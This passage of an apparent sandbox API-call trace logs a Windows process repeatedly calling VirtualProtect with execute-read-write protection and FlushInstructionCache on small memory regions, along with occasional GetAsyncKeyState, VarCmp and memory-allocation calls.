[0105.135] VirtualProtect (in: lpAddress=0xcaa6f2c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.136] GetCurrentProcess () returned 0xffffffff [0105.136] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f2d, dwSize=0x2) returned 1 [0105.136] GetCurrentProcess () returned 0xffffffff [0105.136] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa82e0, dwSize=0x14) returned 1 [0105.137] VirtualProtect (in: lpAddress=0xcaa82e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.137] GetCurrentProcess () returned 0xffffffff [0105.137] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa82e1, dwSize=0x2) returned 1 [0105.137] GetCurrentProcess () returned 0xffffffff [0105.137] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8300, dwSize=0x14) returned 1 [0105.137] VirtualProtect (in: lpAddress=0xcaa8300, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.138] GetCurrentProcess () returned 0xffffffff [0105.138] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8301, dwSize=0x2) returned 1 [0105.138] GetCurrentProcess () returned 0xffffffff [0105.138] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8320, dwSize=0x14) returned 1 [0105.138] VirtualProtect (in: lpAddress=0xcaa8320, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.138] GetCurrentProcess () returned 0xffffffff [0105.138] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8321, dwSize=0x2) returned 1 [0105.138] GetCurrentProcess () returned 0xffffffff [0105.138] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8340, dwSize=0x14) returned 1 [0105.138] VirtualProtect (in: lpAddress=0xcaa8340, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.139] GetCurrentProcess () returned 0xffffffff [0105.139] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8341, dwSize=0x2) returned 1 [0105.139] GetCurrentProcess () returned 0xffffffff [0105.139] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8360, dwSize=0x14) returned 1 [0105.139] VirtualProtect (in: lpAddress=0xcaa8360, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.139] GetCurrentProcess () returned 0xffffffff [0105.139] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8361, dwSize=0x2) returned 1 [0105.139] GetCurrentProcess () returned 0xffffffff [0105.139] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8380, dwSize=0x14) returned 1 [0105.139] VirtualProtect (in: lpAddress=0xcaa8380, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.140] GetCurrentProcess () returned 0xffffffff [0105.140] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8381, dwSize=0x2) returned 1 [0105.140] GetCurrentProcess () returned 0xffffffff [0105.140] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83a0, dwSize=0x14) returned 1 [0105.140] VirtualProtect (in: lpAddress=0xcaa83a0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.140] GetCurrentProcess () returned 0xffffffff [0105.140] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83a1, dwSize=0x2) returned 1 [0105.140] GetCurrentProcess () returned 0xffffffff [0105.140] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83c0, dwSize=0x14) returned 1 [0105.140] VirtualProtect (in: lpAddress=0xcaa83c0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.141] GetCurrentProcess () returned 0xffffffff [0105.141] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83c1, dwSize=0x2) returned 1 [0105.141] GetCurrentProcess () returned 0xffffffff [0105.141] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83e0, dwSize=0x14) returned 1 [0105.141] VirtualProtect (in: lpAddress=0xcaa83e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.141] GetCurrentProcess () returned 0xffffffff [0105.142] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83e1, dwSize=0x2) returned 1 [0105.142] GetCurrentProcess () returned 0xffffffff [0105.142] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8400, dwSize=0x14) returned 1 [0105.142] VirtualProtect (in: lpAddress=0xcaa8400, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.142] GetCurrentProcess () returned 0xffffffff [0105.142] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8401, dwSize=0x2) returned 1 [0105.142] GetCurrentProcess () returned 0xffffffff [0105.142] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8420, dwSize=0x14) returned 1 [0105.142] VirtualProtect (in: lpAddress=0xcaa8420, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.143] GetCurrentProcess () returned 0xffffffff [0105.143] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8421, dwSize=0x2) returned 1 [0105.143] GetCurrentProcess () returned 0xffffffff [0105.143] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8440, dwSize=0x14) returned 1 [0105.143] VirtualProtect (in: lpAddress=0xcaa8440, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.144] GetCurrentProcess () returned 0xffffffff [0105.144] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8441, dwSize=0x2) returned 1 [0105.144] GetCurrentProcess () returned 0xffffffff [0105.144] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8460, dwSize=0x14) returned 1 [0105.144] VirtualProtect (in: lpAddress=0xcaa8460, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.144] GetCurrentProcess () returned 0xffffffff [0105.144] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8461, dwSize=0x2) returned 1 [0105.144] GetCurrentProcess () returned 0xffffffff [0105.144] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8480, dwSize=0x14) returned 1 [0105.144] VirtualProtect (in: lpAddress=0xcaa8480, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.145] GetCurrentProcess () returned 0xffffffff [0105.145] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8481, dwSize=0x2) returned 1 [0105.145] GetCurrentProcess () returned 0xffffffff [0105.145] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84a0, dwSize=0x14) returned 1 [0105.145] VirtualProtect (in: lpAddress=0xcaa84a0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.146] GetCurrentProcess () returned 0xffffffff [0105.146] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84a1, dwSize=0x2) returned 1 [0105.146] GetCurrentProcess () returned 0xffffffff [0105.146] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84c0, dwSize=0x14) returned 1 [0105.146] VirtualProtect (in: lpAddress=0xcaa84c0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.146] GetCurrentProcess () returned 0xffffffff [0105.146] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84c1, dwSize=0x2) returned 1 [0105.146] GetCurrentProcess () returned 0xffffffff [0105.146] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6288, dwSize=0x14) returned 1 [0105.146] VirtualProtect (in: lpAddress=0xcaa6288, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.147] GetCurrentProcess () returned 0xffffffff [0105.147] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6289, dwSize=0x2) returned 1 [0105.147] GetCurrentProcess () returned 0xffffffff [0105.147] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62a8, dwSize=0x14) returned 1 [0105.147] VirtualProtect (in: lpAddress=0xcaa62a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.148] GetCurrentProcess () returned 0xffffffff [0105.148] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62a9, dwSize=0x2) returned 1 [0105.148] GetCurrentProcess () returned 0xffffffff [0105.148] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62c8, dwSize=0x14) returned 1 [0105.148] VirtualProtect (in: lpAddress=0xcaa62c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.149] GetCurrentProcess () returned 0xffffffff [0105.149] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62c9, dwSize=0x2) returned 1 [0105.149] GetAsyncKeyState (vKey=3) returned 0 [0105.150] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.150] CRetailMalloc_Alloc () returned 0xcbddc28 [0105.150] memcpy (in: _Dst=0xaf5168, _Src=0x1976bc, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0105.150] memcpy (in: _Dst=0xcbddc48, _Src=0x197724, _Size=0x18 | out: _Dst=0xcbddc48) returned 0xcbddc48 [0105.150] CRetailMalloc_Realloc () returned 0xcbddc28 [0105.150] CRetailMalloc_Free () returned 0x1 [0105.150] GetCurrentProcess () returned 0xffffffff [0105.150] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dcc, dwSize=0x14) returned 1 [0105.150] VirtualProtect (in: lpAddress=0xcaa6dcc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.151] GetCurrentProcess () returned 0xffffffff [0105.151] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dcd, dwSize=0x2) returned 1 [0105.151] GetCurrentProcess () returned 0xffffffff [0105.151] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dec, dwSize=0x14) returned 1 [0105.151] VirtualProtect (in: lpAddress=0xcaa6dec, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.152] GetCurrentProcess () returned 0xffffffff [0105.152] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ded, dwSize=0x2) returned 1 [0105.152] GetCurrentProcess () returned 0xffffffff [0105.152] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e0c, dwSize=0x14) returned 1 [0105.152] VirtualProtect (in: lpAddress=0xcaa6e0c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.153] GetCurrentProcess () returned 0xffffffff [0105.153] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e0d, dwSize=0x2) returned 1 [0105.153] GetCurrentProcess () returned 0xffffffff [0105.153] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e2c, dwSize=0x14) returned 1 [0105.153] VirtualProtect (in: lpAddress=0xcaa6e2c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.154] GetCurrentProcess () returned 0xffffffff [0105.154] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e2d, dwSize=0x2) returned 1 [0105.154] GetCurrentProcess () returned 0xffffffff [0105.154] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e4c, dwSize=0x14) returned 1 [0105.154] VirtualProtect (in: lpAddress=0xcaa6e4c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.154] GetCurrentProcess () returned 0xffffffff [0105.154] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e4d, dwSize=0x2) returned 1 [0105.154] GetCurrentProcess () returned 0xffffffff [0105.154] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e6c, dwSize=0x14) returned 1 [0105.154] VirtualProtect (in: lpAddress=0xcaa6e6c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.155] GetCurrentProcess () returned 0xffffffff [0105.155] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e6d, dwSize=0x2) returned 1 [0105.155] GetCurrentProcess () returned 0xffffffff [0105.155] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e8c, dwSize=0x14) returned 1 [0105.155] VirtualProtect (in: lpAddress=0xcaa6e8c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.156] GetCurrentProcess () returned 0xffffffff [0105.156] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e8d, dwSize=0x2) returned 1 [0105.156] GetCurrentProcess () returned 0xffffffff [0105.156] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eac, dwSize=0x14) returned 1 [0105.156] VirtualProtect (in: lpAddress=0xcaa6eac, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.156] GetCurrentProcess () returned 0xffffffff [0105.157] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ead, dwSize=0x2) returned 1 [0105.157] GetCurrentProcess () returned 0xffffffff [0105.157] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ecc, dwSize=0x14) returned 1 [0105.157] VirtualProtect (in: lpAddress=0xcaa6ecc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.157] GetCurrentProcess () returned 0xffffffff [0105.157] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ecd, dwSize=0x2) returned 1 [0105.157] GetCurrentProcess () returned 0xffffffff [0105.157] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eec, dwSize=0x14) returned 1 [0105.157] VirtualProtect (in: lpAddress=0xcaa6eec, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.158] GetCurrentProcess () returned 0xffffffff [0105.158] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eed, dwSize=0x2) returned 1 [0105.158] GetCurrentProcess () returned 0xffffffff [0105.158] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f0c, dwSize=0x14) returned 1 [0105.158] VirtualProtect (in: lpAddress=0xcaa6f0c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.159] GetCurrentProcess () returned 0xffffffff [0105.159] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f0d, dwSize=0x2) returned 1 [0105.159] GetCurrentProcess () returned 0xffffffff [0105.159] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f2c, dwSize=0x14) returned 1 [0105.159] VirtualProtect (in: lpAddress=0xcaa6f2c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.159] GetCurrentProcess () returned 0xffffffff [0105.159] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f2d, dwSize=0x2) returned 1 [0105.159] GetCurrentProcess () returned 0xffffffff [0105.159] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa82e0, dwSize=0x14) returned 1 [0105.159] VirtualProtect (in: lpAddress=0xcaa82e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.160] GetCurrentProcess () returned 0xffffffff [0105.160] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa82e1, dwSize=0x2) returned 1 [0105.160] GetCurrentProcess () returned 0xffffffff [0105.160] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8300, dwSize=0x14) returned 1 [0105.160] VirtualProtect (in: lpAddress=0xcaa8300, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.161] GetCurrentProcess () returned 0xffffffff [0105.161] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8301, dwSize=0x2) returned 1 [0105.161] GetCurrentProcess () returned 0xffffffff [0105.161] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8320, dwSize=0x14) returned 1 [0105.161] VirtualProtect (in: lpAddress=0xcaa8320, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.161] GetCurrentProcess () returned 0xffffffff [0105.161] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8321, dwSize=0x2) returned 1 [0105.161] GetCurrentProcess () returned 0xffffffff [0105.162] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8340, dwSize=0x14) returned 1 [0105.162] VirtualProtect (in: lpAddress=0xcaa8340, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.162] GetCurrentProcess () returned 0xffffffff [0105.162] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8341, dwSize=0x2) returned 1 [0105.162] GetCurrentProcess () returned 0xffffffff [0105.162] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8360, dwSize=0x14) returned 1 [0105.162] VirtualProtect (in: lpAddress=0xcaa8360, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.163] GetCurrentProcess () returned 0xffffffff [0105.163] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8361, dwSize=0x2) returned 1 [0105.163] GetCurrentProcess () returned 0xffffffff [0105.163] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8380, dwSize=0x14) returned 1 [0105.163] VirtualProtect (in: lpAddress=0xcaa8380, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.164] GetCurrentProcess () returned 0xffffffff [0105.164] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8381, dwSize=0x2) returned 1 [0105.164] GetCurrentProcess () returned 0xffffffff [0105.164] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83a0, dwSize=0x14) returned 1 [0105.164] VirtualProtect (in: lpAddress=0xcaa83a0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.164] GetCurrentProcess () returned 0xffffffff [0105.164] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83a1, dwSize=0x2) returned 1 [0105.164] GetCurrentProcess () returned 0xffffffff [0105.164] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83c0, dwSize=0x14) returned 1 [0105.164] VirtualProtect (in: lpAddress=0xcaa83c0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.165] GetCurrentProcess () returned 0xffffffff [0105.165] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83c1, dwSize=0x2) returned 1 [0105.165] GetCurrentProcess () returned 0xffffffff [0105.165] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83e0, dwSize=0x14) returned 1 [0105.165] VirtualProtect (in: lpAddress=0xcaa83e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.166] GetCurrentProcess () returned 0xffffffff [0105.166] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83e1, dwSize=0x2) returned 1 [0105.166] GetCurrentProcess () returned 0xffffffff [0105.166] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8400, dwSize=0x14) returned 1 [0105.166] VirtualProtect (in: lpAddress=0xcaa8400, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.166] GetCurrentProcess () returned 0xffffffff [0105.166] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8401, dwSize=0x2) returned 1 [0105.204] GetCurrentProcess () returned 0xffffffff [0105.204] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8420, dwSize=0x14) returned 1 [0105.204] VirtualProtect (in: lpAddress=0xcaa8420, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.205] GetCurrentProcess () returned 0xffffffff [0105.205] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8421, dwSize=0x2) returned 1 [0105.205] GetCurrentProcess () returned 0xffffffff [0105.205] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8440, dwSize=0x14) returned 1 [0105.205] VirtualProtect (in: lpAddress=0xcaa8440, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.206] GetCurrentProcess () returned 0xffffffff [0105.206] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8441, dwSize=0x2) returned 1 [0105.206] GetCurrentProcess () returned 0xffffffff [0105.206] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8460, dwSize=0x14) returned 1 [0105.206] VirtualProtect (in: lpAddress=0xcaa8460, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.206] GetCurrentProcess () returned 0xffffffff [0105.206] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8461, dwSize=0x2) returned 1 [0105.206] GetCurrentProcess () returned 0xffffffff [0105.206] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8480, dwSize=0x14) returned 1 [0105.206] VirtualProtect (in: lpAddress=0xcaa8480, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.207] GetCurrentProcess () returned 0xffffffff [0105.207] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8481, dwSize=0x2) returned 1 [0105.207] GetCurrentProcess () returned 0xffffffff [0105.207] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84a0, dwSize=0x14) returned 1 [0105.207] VirtualProtect (in: lpAddress=0xcaa84a0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.208] GetCurrentProcess () returned 0xffffffff [0105.208] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84a1, dwSize=0x2) returned 1 [0105.208] GetCurrentProcess () returned 0xffffffff [0105.208] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84c0, dwSize=0x14) returned 1 [0105.208] VirtualProtect (in: lpAddress=0xcaa84c0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.209] GetCurrentProcess () returned 0xffffffff [0105.209] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84c1, dwSize=0x2) returned 1 [0105.209] GetCurrentProcess () returned 0xffffffff [0105.209] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6288, dwSize=0x14) returned 1 [0105.209] VirtualProtect (in: lpAddress=0xcaa6288, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.209] GetCurrentProcess () returned 0xffffffff [0105.210] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6289, dwSize=0x2) returned 1 [0105.210] GetCurrentProcess () returned 0xffffffff [0105.210] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62a8, dwSize=0x14) returned 1 [0105.210] VirtualProtect (in: lpAddress=0xcaa62a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.210] GetCurrentProcess () returned 0xffffffff [0105.210] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62a9, dwSize=0x2) returned 1 [0105.210] GetCurrentProcess () returned 0xffffffff [0105.210] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62c8, dwSize=0x14) returned 1 [0105.210] VirtualProtect (in: lpAddress=0xcaa62c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.211] GetCurrentProcess () returned 0xffffffff [0105.211] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62c9, dwSize=0x2) returned 1 [0105.213] GetAsyncKeyState (vKey=3) returned 0 [0105.213] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.214] CRetailMalloc_Alloc () returned 0xcbddc88 [0105.214] memcpy (in: _Dst=0xaf5168, _Src=0x1976bc, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0105.214] memcpy (in: _Dst=0xcbddca8, _Src=0x197724, _Size=0x18 | out: _Dst=0xcbddca8) returned 0xcbddca8 [0105.214] CRetailMalloc_Realloc () returned 0xcbddc88 [0105.214] CRetailMalloc_Free () returned 0x1 [0105.214] GetCurrentProcess () returned 0xffffffff [0105.214] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dcc, dwSize=0x14) returned 1 [0105.214] VirtualProtect (in: lpAddress=0xcaa6dcc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.215] GetCurrentProcess () returned 0xffffffff [0105.215] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dcd, dwSize=0x2) returned 1 [0105.215] GetCurrentProcess () returned 0xffffffff [0105.215] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dec, dwSize=0x14) returned 1 [0105.215] VirtualProtect (in: lpAddress=0xcaa6dec, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.216] GetCurrentProcess () returned 0xffffffff [0105.216] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ded, dwSize=0x2) returned 1 [0105.216] GetCurrentProcess () returned 0xffffffff [0105.216] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e0c, dwSize=0x14) returned 1 [0105.216] VirtualProtect (in: lpAddress=0xcaa6e0c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.216] GetCurrentProcess () returned 0xffffffff [0105.217] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e0d, dwSize=0x2) returned 1 [0105.217] GetCurrentProcess () returned 0xffffffff [0105.217] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e2c, dwSize=0x14) returned 1 [0105.217] VirtualProtect (in: lpAddress=0xcaa6e2c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: 